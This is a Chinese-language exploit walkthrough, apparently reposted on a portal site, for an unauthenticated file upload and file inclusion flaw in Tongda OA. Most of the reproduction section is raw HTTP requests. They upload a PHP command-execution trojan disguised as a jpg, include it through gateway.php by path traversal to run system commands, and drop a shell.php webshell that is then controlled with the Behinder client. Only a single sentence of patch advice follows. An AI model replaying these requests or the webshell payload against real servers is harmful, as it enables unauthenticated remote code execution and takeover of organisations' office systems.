您好,欢迎访问一九零五行业门户网

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

一、漏洞介绍通达oa介绍:
通达oa(office anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,北京通达信科科技有限公司是一支以协同管理软件研发与实施、服务与咨询为主营业务的高科技团队,是国内协同管理软件行业里唯一一家央企单位,中国协同管理软件的领军企业。
通达oa为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。该系统采用领先的b/s(浏览器/服务器)操作方式,使得网络办公不受地域限。通达office anywhere采用基于web的企业计算,主http服务器采用了世界上最先进的apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。
漏洞影响的版本有:
v11版、2017版、2016版、2015版、2013增强版、2013版。
备注:
无需登录,前台即可实现漏洞利用
2013版:
文件上传漏洞路径:/ispirit/im/upload.php
文件包含漏洞路径:/ispirit/interface/gateway.php
2017版:
文件上传漏洞路径:/ispirit/im/upload.php
文件包含漏洞路径:/mac/gateway.php
漏洞环境:
靶机(windows server 2008 r2)ip:172.16.0.45
通达oa:v 11.3版本
二、环境搭建(1)下载通达oa v11.3版本以后,点击运行tdoa11.3的应用程序运行文件
(2)确保80端口不被占用的情况下,将应用搭建在80端口,然后点击下一步
(3)配置完成
(4)查看搭建的结果
(5)账户为admin,密码为空,登陆到后端系统
三、漏洞复现3.1 任意命令执行(2)存在无需登录即可上传任意文件的前台漏洞,攻击者可以通过抓取数据包、修改并重放数据包的方式,上传后缀为jpg的木马文件来攻击系统
post /ispirit/im/upload.php http/1.1host: 172.16.0.45cache-control: no-cacheuser-agent: mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/80.0.3987.132 safari/537.36content-type: multipart/form-data; boundary=----webkitformboundarypyfbh2yb4pv8mcgbaccept: */*accept-encoding: gzip, deflateaccept-language: zh-cn,zh;q=0.9,zh-hk;q=0.8,ja;q=0.7,en;q=0.6,zh-tw;q=0.5cookie: phpsessid=123connection: closecontent-length: 660------webkitformboundarypyfbh2yb4pv8mcgbcontent-disposition: form-data; name=upload_mode2------webkitformboundarypyfbh2yb4pv8mcgbcontent-disposition: form-data; name=p123------webkitformboundarypyfbh2yb4pv8mcgbcontent-disposition: form-data; name=dest_uid1------webkitformboundarypyfbh2yb4pv8mcgbcontent-disposition: form-data; name=attachment; filename=jpgcontent-type: image/jpeg<?php$command=$_post['cmd'];$wsh = new com('wscript.shell');$exec = $wsh->exec(cmd /c .$command);$stdout = $exec->stdout();$stroutput = $stdout->readall();echo $stroutput;?>------webkitformboundarypyfbh2yb4pv8mcgb--
(2)查看运行结果
(3)前台文件包含漏洞:修改数据包,包含前面上传的jpg木马文件,即可实现执行任意命令
此处执行命令“net user”
post /ispirit/interface/gateway.php http/1.1host: 172.16.0.45cache-control: max-age=0upgrade-insecure-requests: 1user-agent: mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/78.0.3904.108 safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3accept-encoding: gzip, deflateaccept-language: zh-cn,zh;q=0.9connection: closecontent-type: application/x-www-form-urlencodedcontent-length: 71json={url:/general/../../attach/im/2012/820434636.jpg}&cmd=net user
(4)前台文件包含漏洞:修改数据包,包含前面上传的jpg木马文件,即可实现执行任意命令
此处执行命令“ipconfig”
post /ispirit/interface/gateway.php http/1.1host: 172.16.0.45cache-control: max-age=0upgrade-insecure-requests: 1user-agent: mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/78.0.3904.108 safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3accept-encoding: gzip, deflateaccept-language: zh-cn,zh;q=0.9connection: closecontent-type: application/x-www-form-urlencodedcontent-length: 73json={url:/general/../../attach/im/2012/820434636.jpg}&cmd=ipconfig
3.2 getshell(1)前台任意文件上传漏洞:抓取任意数据包,修改数据包进行重放,上传后缀为jpg的木马文件(木马文件执行写入文件操作)
post /ispirit/im/upload.php http/1.1
(2)查看运行结果
(3)查看/webroot/ispirit/interface/目录下的文件信息
(4)前台文件包含漏洞:修改数据包,包含前面上传的jpg木马文件,会在文件包含的根目录下生成一个 shell.php 文件
post /ispirit/interface/gateway.php http/1.1host: 172.16.0.45cache-control: max-age=0upgrade-insecure-requests: 1user-agent: mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/78.0.3904.108 safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3accept-encoding: gzip, deflateaccept-language: zh-cn,zh;q=0.9connection: closecontent-type: application/x-www-form-urlencodedcontent-length: 73json={url:/general/../../attach/im/2012/213131861.jpg}&cmd=ipconfig
(5)查看文件包含漏洞的执行结果
(6)使用冰蝎进行连接:http://172.16.0.45/ispirit/interface/shell.php
密码为:pass
ps:此处用蚁剑和菜刀无法进行连接
四、加固建议我们建议通达oa用户使用受影响版本登录通达oa官网,并获取最新的补丁。请根据当前oa版本选择所对应的程序文件,运行前请先做好备份。
以上就是通达oa前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析的详细内容。
其它类似信息

推荐信息